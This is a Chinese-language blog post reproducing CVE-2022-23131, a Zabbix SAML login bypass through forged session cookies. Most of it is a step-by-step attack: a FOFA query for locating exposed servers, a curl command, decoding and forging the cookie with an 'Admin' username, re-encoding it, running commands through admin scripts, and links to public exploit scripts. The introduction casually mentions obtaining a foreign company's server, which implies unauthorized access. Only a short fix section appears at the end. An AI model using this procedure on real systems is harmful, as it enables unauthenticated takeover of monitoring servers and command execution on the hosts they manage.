Zabbix登录绕过漏洞复现（CVE-2022-23131）

系统管理员 2024-04-07 10:37 73阅读 0赞

### **0x00 前言** ###

最近在复现zabbix的漏洞(CVE-2022-23131)，偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞，该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下，恶意行为者可以修改会话数据，因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。

### **0x01 漏洞原因** ###

在启用 SAML SSO 身份验证(非默认)的情况下，恶意攻击者可以修改会话数据来实现身份认证绕过。未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。

该漏洞存在于index\_sso.php文件中，由于index\_sso.php文件未调用CEncryptedCookieSession::checkSign()方法对cookie进行校验，且客户端的cookie可被伪造。

从index\_sso.php文件中可以看出，当伪造的cookie中存在saml\_data时，获取username\_attribute的数据，如果该用户真实存在则会生成一个sessionid从而实现身份认证绕过

### **0x02 漏洞影响** ###

5.4.8

5.0.18

4.0.36

### **0x03 漏洞复现** ###

fofa：app="ZABBIX-监控系统" && body="saml"

执行curl -ksSIL http://xxx.com/

![image-20220228135432625][]

获取到set-cookie的值，然后先进行url解码，然后再进行base64解码

URL解码：

eyJzZXNzaW9uaWQiOiIxNzFiODAwOTI4NDQ2MmUxZGRhODAyYWFjODk5MDI2YyIsInNpZ24iOiJ0eTZSZVkzVDRxVEdYenJseFM2ZlpyNTRhT3pCMHBhS25vWHBhZDR3MHdKc2lwNTJ2aUdndytDUlpqeVJyQUJ5WDk5bGhNMVVHbFM4cTRwNjBKb1wvUGc9PSJ9

Base64解码：

\{"sessionid":"171b8009284462e1dda802aac899026c","sign":"ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo\\/Pg=="\}

![image-20220228135629785][]

然后拼接字符串

\{"saml\_data":\{"username\_attribute":"Admin"\},"sessionid":"171b8009284462e1dda802aac899026c","sign":"ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo\\/Pg=="\}

拼接之后在进行base64加密

![image-20220228142358256][]

然后在进行URLEncode

![image-20220228142419540][]

![image-20220228142545863][]

--------------------

### **执行命令** ###

![image-20220228142656315][]

找到Administration--> Scripts 创建新的脚本，这里我创建的ifconfig

![image-20220228143058058][]

![image-20220228142800341][]

在监控中找到最新数据，然后筛选出来你想执行的主机组，点击主机名执行对应命令

![image-20220228142957655][]

或者

`GitHub漏洞利用脚本：`

https://github.com/L0ading-x/cve-2022-23131

https://github.com/Mr-xn/cve-2022-23131

`执行脚本，Admin为默认的高权限用户，获取其session值。`

`替换cookie中的zbx_session值为payload，接着点击 Sign in with Single Sign-On (SAML)`

`或者使用EditThisCookie 对cookie值 进行替换`

`成功绕过登录，进入系统。`

### **0x04 修复方法** ###

1、禁用 SAML 身份验证

2、升级安全版本(https://support.zabbix.com/browse/ZBX-20350)

[image-20220228135432625]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/1773243e8be744f79698fd7b2f5198a5.png
[image-20220228135629785]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5dd5f04b528a48a3979212c31b074750.png
[image-20220228142358256]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/38694865fc7645ba947375c1a204edc4.png
[image-20220228142419540]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6bd1de5c5183447f93b6716258e372e3.png
[image-20220228142545863]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/389c4038b5424b7baa144ad6c6f0b894.png
[image-20220228142656315]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/31188181b207483da6f214c27077a139.png
[image-20220228143058058]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/07d1fed83bf14184a12f179c00536c16.png
[image-20220228142800341]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/2947ab8154b2419c84d6f184e3d2c2b4.png
[image-20220228142957655]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/54754bfb6fab4c19bb7b0be50c42f188.png